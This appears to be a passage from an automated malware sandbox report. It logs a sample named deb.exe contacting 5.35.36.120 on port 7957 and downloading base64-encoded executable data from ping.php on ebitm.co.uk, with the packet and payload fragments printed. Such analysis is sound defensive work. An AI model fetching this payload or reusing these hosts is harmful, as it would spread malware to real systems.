                                                      Dec 19, 2024 09:29:55.485645056 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.486190081 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.486531973 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.486581087 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.487248898 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.487638950 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.487709999 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.488364935 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.488570929 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.488627911 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.489444971 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.489694118 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.489787102 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.490587950 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.491020918 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.491081953 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.491725922 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.491991043 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.492057085 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.492746115 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.493259907 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.493325949 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.493868113 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.493987083 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.494036913 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.495112896 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.495202065 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.495258093 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.496009111 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.496197939 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.496248960 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.497210979 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.497401953 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.497553110 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.498203993 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.498713970 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.498802900 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.499289036 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.499577045 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.499681950 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.500408888 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.501019955 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.501100063 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.501497984 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.501730919 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.501805067 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.502580881 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.503221035 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.503274918 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.503664970 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.504014969 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.504080057 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.504848957 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.505297899 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.505340099 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.505876064 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.505891085 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.506017923 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.506937027 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.507786989 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.507869005 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.508017063 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.508080006 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.508188963 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.509150982 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.509993076 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.510082960 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.510231972 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.511029959 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.511157036 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.511529922 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.511544943 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.511588097 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.512631893 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.513673067 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.513731003 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.513911963 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.513926983 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.514113903 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.514848948 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.515043020 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.515130043 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.515680075 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.515727997 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.515928984 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.516844988 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.517268896 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.517374992 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.517998934 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.568048954 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.653058052 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.653093100 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.653223991 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.653232098 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.653368950 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.653551102 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.653978109 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.654103041 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.654154062 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.654999018 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.655339003 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.655392885 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.656070948 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.656737089 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.656784058 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.657277107 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.657294035 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.657399893 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.658247948 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.658601046 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.658649921 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.659405947 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.659423113 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.659600973 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.660415888 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.660628080 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.660700083 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.661530018 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.661691904 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.661787033 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.662632942 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.662936926 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.662996054 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.663712978 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.664191961 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.664246082 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.664804935 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.664819956 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.664865971 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.666273117 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.666624069 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.666793108 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.667009115 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.667098045 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.667587996 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.667587996 CET497927957192.168.2.65.35.36.120
                                                      Dec 19, 2024 09:29:55.787662029 CET7957497925.35.36.120192.168.2.6
                                                      Dec 19, 2024 09:29:55.787676096 CET7957497925.35.36.120192.168.2.6

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 19, 2024 09:29:12.643903017 CET5199253192.168.2.61.1.1.1
                                                      Dec 19, 2024 09:29:13.067773104 CET53519921.1.1.1192.168.2.6
                                                      Dec 19, 2024 09:29:24.330614090 CET6527753192.168.2.61.1.1.1
                                                      Dec 19, 2024 09:29:24.547774076 CET53652771.1.1.1192.168.2.6

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 19, 2024 09:29:12.643903017 CET192.168.2.61.1.1.10x6f04Standard query (0)ebitm.co.ukA (IP address)IN (0x0001)false
                                                      Dec 19, 2024 09:29:24.330614090 CET192.168.2.61.1.1.10x3f5fStandard query (0)dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuDA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 19, 2024 09:29:13.067773104 CET1.1.1.1192.168.2.60x6f04No error (0)ebitm.co.uk185.199.220.71A (IP address)IN (0x0001)false
                                                      Dec 19, 2024 09:29:24.547774076 CET1.1.1.1192.168.2.60x3f5fName error (3)dVxTXNLGomMFsmfMnuD.dVxTXNLGomMFsmfMnuDnonenoneA (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • ebitm.co.uk

                                                      HTTPS Proxied Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.649710185.199.220.714431880C:\Users\user\Desktop\deb.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-12-19 08:29:14 UTC119OUTGET /salah/wp-includes/assets/ping.php HTTP/1.1
                                                      User-Agent: EXEFetcher
                                                      Host: ebitm.co.uk
                                                      Cache-Control: no-cache
                                                      2024-12-19 08:29:15 UTC358INHTTP/1.1 200 OK
                                                      Connection: close
                                                      content-type: text/plain;charset=UTF-8
                                                      transfer-encoding: chunked
                                                      date: Thu, 19 Dec 2024 08:29:15 GMT
                                                      server: LiteSpeed
                                                      vary: User-Agent
                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                      2024-12-19 08:29:15 UTC1010INData Raw: 31 30 30 30 30 0d 0a 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 30 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 42 65 39 46 72 42 52 71 2f 4f 41 55 61 76 7a 67 46 47 72 38 34 44 47 49 38 4f 41 59 61 76 7a 67 4d 59 69 77 34 46 42 71 2f 4f 41 55 61 76 6a 69 70 47 72 38 34 48 6f 63 56 4f 41 6b 61 76 7a 67 65 68 79 55 34 42 42 71 2f 4f 42 36 48
                                                      Data Ascii: 10000TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABBe9FrBRq/OAUavzgFGr84DGI8OAYavzgMYiw4FBq/OAUavjipGr84HocVOAkavzgehyU4BBq/OB6H
                                                      2024-12-19 08:29:15 UTC14994INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      2024-12-19 08:29:15 UTC16384INData Raw: 57 77 6b 45 49 4d 4e 6a 4f 74 48 41 50 2f 6f 61 78 34 41 41 47 6f 42 69 55 51 6b 48 4f 67 62 4a 67 41 41 36 49 6a 39 2f 2f 2f 2f 46 63 53 53 51 41 41 35 62 43 51 51 44 34 54 74 41 41 41 41 61 42 41 41 49 41 44 2f 64 43 51 55 36 4c 45 68 41 41 42 71 41 76 38 56 70 4a 42 41 41 47 67 49 6f 6b 41 41 55 2b 67 6a 4a 51 41 41 76 72 69 77 54 51 42 57 55 2f 38 56 47 4a 46 41 41 49 58 41 64 4c 6c 56 55 2f 38 56 68 4a 42 41 41 46 50 2f 46 58 69 51 51 41 42 6d 4f 53 32 6f 4d 45 30 41 64 51 74 57 61 4b 67 77 54 51 44 6f 30 79 51 41 41 50 39 30 4a 42 78 6f 41 50 42 48 41 4f 6a 46 4a 41 41 41 61 41 53 69 51 41 42 6f 43 44 42 49 41 4f 69 32 4a 41 41 41 61 68 70 66 76 6b 44 64 51 77 43 68 76 4f 70 48 41 50 2b 77 49 41 45 41 41 46 62 6f 6d 53 77 41 41 46 62 2f 46 58 43 52
                                                      Data Ascii: WwkEIMNjOtHAP/oax4AAGoBiUQkHOgbJgAA6Ij9////FcSSQAA5bCQQD4TtAAAAaBAAIAD/dCQU6LEhAABqAv8VpJBAAGgIokAAU+gjJQAAvriwTQBWU/8VGJFAAIXAdLlVU/8VhJBAAFP/FXiQQABmOS2oME0AdQtWaKgwTQDo0yQAAP90JBxoAPBHAOjFJAAAaASiQABoCDBIAOi2JAAAahpfvkDdQwChvOpHAP+wIAEAAFbomSwAAFb/FXCR
                                                      2024-12-19 08:29:15 UTC16384INData Raw: 42 77 7a 37 62 34 41 42 41 41 41 4f 2f 31 30 4b 57 6f 42 56 56 66 6f 69 66 50 2f 2f 31 44 2f 46 62 79 51 51 41 42 57 55 31 66 2f 46 57 79 51 51 41 41 37 78 51 2b 45 67 77 45 41 41 44 76 47 44 34 39 37 41 51 41 41 56 72 39 34 74 45 59 41 56 2f 39 30 4a 43 44 2f 46 57 79 51 51 41 41 37 78 51 2b 45 59 67 45 41 41 44 76 47 44 34 39 61 41 51 41 41 56 56 56 57 61 43 42 6d 52 67 42 71 2f 31 4f 4c 48 55 69 52 51 41 42 56 56 66 2f 54 68 63 41 50 68 44 30 42 41 41 42 56 56 56 61 2b 63 47 78 47 41 46 5a 71 2f 31 64 56 56 66 2f 54 68 63 41 50 68 43 55 42 41 41 42 57 61 43 42 6d 52 67 42 6f 67 4b 68 41 41 47 68 77 63 45 59 41 2f 78 55 6f 6b 6b 41 41 67 38 51 51 69 39 69 68 76 4f 70 48 41 50 2b 77 4b 41 45 41 41 46 66 6f 6e 50 7a 2f 2f 32 6f 45 61 41 41 41 41 4d 42 58
                                                      Data Ascii: Bwz7b4ABAAAO/10KWoBVVfoifP//1D/FbyQQABWU1f/FWyQQAA7xQ+EgwEAADvGD497AQAAVr94tEYAV/90JCD/FWyQQAA7xQ+EYgEAADvGD49aAQAAVVVWaCBmRgBq/1OLHUiRQABVVf/ThcAPhD0BAABVVVa+cGxGAFZq/1dVVf/ThcAPhCUBAABWaCBmRgBogKhAAGhwcEYA/xUokkAAg8QQi9ihvOpHAP+wKAEAAFfonPz//2oEaAAAAMBX
                                                      2024-12-19 08:29:15 UTC16384INData Raw: 46 51 41 58 77 42 44 41 45 38 41 54 67 42 47 41 45 6b 41 52 77 41 41 41 45 67 41 53 77 42 46 41 46 6b 41 58 77 42 51 41 45 55 41 55 67 42 47 41 45 38 41 55 67 42 4e 41 45 45 41 54 67 42 44 41 45 55 41 58 77 42 45 41 45 45 41 56 41 42 42 41 41 41 41 53 41 42 4c 41 45 55 41 57 51 42 66 41 46 55 41 55 77 42 46 41 46 49 41 55 77 41 41 41 41 41 41 53 41 42 4c 41 45 55 41 57 51 42 66 41 45 77 41 54 77 42 44 41 45 45 41 54 41 42 66 41 45 30 41 51 51 42 44 41 45 67 41 53 51 42 4f 41 45 55 41 41 41 41 41 41 45 67 41 53 77 42 46 41 46 6b 41 58 77 42 44 41 46 55 41 55 67 42 53 41 45 55 41 54 67 42 55 41 46 38 41 56 51 42 54 41 45 55 41 55 67 41 41 41 45 67 41 53 77 42 46 41 46 6b 41 58 77 42 44 41 45 77 41 51 51 42 54 41 46 4d 41 52 51 42 54 41 46 38 41 55 67 42 50
                                                      Data Ascii: FQAXwBDAE8ATgBGAEkARwAAAEgASwBFAFkAXwBQAEUAUgBGAE8AUgBNAEEATgBDAEUAXwBEAEEAVABBAAAASABLAEUAWQBfAFUAUwBFAFIAUwAAAAAASABLAEUAWQBfAEwATwBDAEEATABfAE0AQQBDAEgASQBOAEUAAAAAAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgAAAEgASwBFAFkAXwBDAEwAQQBTAFMARQBTAF8AUgBP
                                                      2024-12-19 08:29:15 UTC16384INData Raw: 56 69 4c 33 73 5a 48 36 4b 6d 39 68 38 37 79 71 32 69 39 66 51 47 4e 56 38 36 67 2f 76 79 6e 36 44 2f 2f 4a 32 6a 2f 34 48 39 43 79 77 66 2f 69 6c 7a 68 62 5a 4b 2f 4b 39 49 30 38 5a 53 6c 6e 7a 56 65 79 33 6f 35 51 6d 6d 6c 77 31 62 61 77 4b 77 51 7a 52 58 57 32 59 79 52 30 47 72 46 34 32 6b 42 6c 54 59 63 46 46 78 34 50 4f 50 42 49 64 46 43 32 4e 47 73 56 7a 72 75 35 65 79 45 58 44 50 66 49 39 59 49 6a 47 4d 35 6f 6e 39 46 79 45 49 36 4c 50 68 48 4d 4f 31 53 4d 6b 75 5a 6b 64 5a 2b 5a 71 36 63 54 48 30 41 65 55 73 66 73 6f 54 6a 69 56 48 43 73 72 59 4a 69 5a 46 4b 54 4a 6e 61 6b 61 64 63 54 4f 6e 6f 55 44 36 66 70 6f 55 48 61 2b 48 72 66 34 69 51 6d 4e 77 61 49 75 6b 62 45 62 4f 53 4c 5a 53 57 66 4a 30 77 51 7a 73 79 34 31 30 53 49 6b 78 61 65 79 51 30
                                                      Data Ascii: ViL3sZH6Km9h87yq2i9fQGNV86g/vyn6D//J2j/4H9Cywf/ilzhbZK/K9I08ZSlnzVey3o5Qmmlw1bawKwQzRXW2YyR0GrF42kBlTYcFFx4POPBIdFC2NGsVzru5eyEXDPfI9YIjGM5on9FyEI6LPhHMO1SMkuZkdZ+Zq6cTH0AeUsfsoTjiVHCsrYJiZFKTJnakadcTOnoUD6fpoUHa+Hrf4iQmNwaIukbEbOSLZSWfJ0wQzsy410SIkxaeyQ0
                                                      2024-12-19 08:29:15 UTC16384INData Raw: 65 53 79 79 74 68 38 78 2b 35 38 39 33 73 45 52 65 63 47 54 33 52 55 69 57 67 37 54 47 61 4a 41 50 6f 72 56 78 55 6c 73 4c 45 31 6a 65 37 58 49 31 37 31 61 42 66 53 74 62 2f 37 38 4d 6b 50 30 43 77 51 76 79 4f 64 7a 4c 41 6c 4a 52 4c 77 68 47 49 31 6d 44 4f 6b 30 47 42 67 5a 77 4c 43 79 47 7a 5a 4e 50 79 4c 61 50 73 51 4d 41 2f 44 7a 4b 4e 71 78 50 56 57 33 45 48 63 62 38 4f 78 67 44 54 2f 39 2f 4c 46 45 70 6e 77 4d 47 50 74 67 43 79 59 64 77 31 68 4a 4f 71 45 68 6f 52 52 74 33 38 70 72 46 39 42 77 34 77 77 61 62 7a 49 49 52 4a 66 76 78 6b 64 6f 4c 7a 32 50 6b 64 59 79 31 76 46 4f 61 62 4e 48 68 49 34 31 39 48 64 44 32 64 5a 4b 78 37 4c 32 56 39 65 69 34 31 45 46 57 6c 6b 47 5a 49 39 75 55 6a 6d 30 49 7a 61 6d 4a 6b 4a 6f 6f 4f 37 71 51 6d 74 35 42 64 72
                                                      Data Ascii: eSyyth8x+5893sERecGT3RUiWg7TGaJAPorVxUlsLE1je7XI171aBfStb/78MkP0CwQvyOdzLAlJRLwhGI1mDOk0GBgZwLCyGzZNPyLaPsQMA/DzKNqxPVW3EHcb8OxgDT/9/LFEpnwMGPtgCyYdw1hJOqEhoRRt38prF9Bw4wwabzIIRJfvxkdoLz2PkdYy1vFOabNHhI419HdD2dZKx7L2V9ei41EFWlkGZI9uUjm0IzamJkJooO7qQmt5Bdr
                                                      2024-12-19 08:29:15 UTC16384INData Raw: 30 4a 65 62 72 50 39 65 62 59 6e 2f 5a 58 6d 59 2f 34 43 59 75 66 2b 56 72 73 7a 2f 71 4d 48 62 2f 36 57 37 30 76 2b 61 72 73 48 70 68 5a 65 6f 30 6e 75 4d 6e 63 78 77 67 4a 4c 51 5a 6e 65 4b 31 46 39 73 66 62 31 4e 55 32 43 52 4d 44 4d 38 59 43 63 71 4c 6b 59 4b 43 67 6f 52 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 41 51 49 56 46 68 6b 67 66 6f 75
                                                      Data Ascii: 0JebrP9ebYn/ZXmY/4CYuf+Vrsz/qMHb/6W70v+arsHphZeo0nuMncxwgJLQZneK1F9sfb1NU2CRMDM8YCcqLkYKCgoRAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQIVFhkgfou
                                                      2024-12-19 08:29:15 UTC16384INData Raw: 63 52 59 66 56 67 51 72 6a 30 58 37 61 73 79 44 7a 39 58 59 6e 79 58 43 79 4c 34 36 36 6a 76 6d 76 39 4f 6c 5a 52 30 73 69 2f 6f 36 6f 72 37 32 43 6e 4e 6a 41 71 76 4c 31 64 43 30 75 48 2f 75 50 72 33 68 41 39 62 65 50 45 64 6b 44 39 35 58 6d 41 4d 54 34 74 30 41 6f 7a 4a 55 6b 72 4c 68 6d 35 50 52 61 4c 44 34 2b 4b 43 74 51 62 63 5a 57 70 72 69 31 44 51 37 6e 47 30 72 74 42 48 4f 75 58 30 51 7a 32 6a 2f 5a 6d 64 77 69 67 74 42 63 6c 73 58 66 68 68 35 50 76 65 41 74 38 37 59 4d 71 6a 5a 45 2f 49 7a 73 4c 38 35 77 62 37 56 45 33 4a 38 36 45 45 4e 64 62 51 69 64 35 55 59 62 38 63 52 2b 51 71 37 76 64 4a 45 45 55 61 6b 65 6a 65 4d 63 47 4b 39 36 49 75 5a 72 4c 69 64 49 39 45 6c 65 58 6d 55 67 36 57 34 33 58 41 66 39 32 64 48 76 59 6d 47 4d 34 69 48 50 41 66
                                                      Data Ascii: cRYfVgQrj0X7asyDz9XYnyXCyL466jvmv9OlZR0si/o6or72CnNjAqvL1dC0uH/uPr3hA9bePEdkD95XmAMT4t0AozJUkrLhm5PRaLD4+KCtQbcZWpri1DQ7nG0rtBHOuX0Qz2j/ZmdwigtBclsXfhh5PveAt87YMqjZE/IzsL85wb7VE3J86EENdbQid5UYb8cR+Qq7vdJEEUakejeMcGK96IuZrLidI9EleXmUg6W43XAf92dHvYmGM4iHPAf
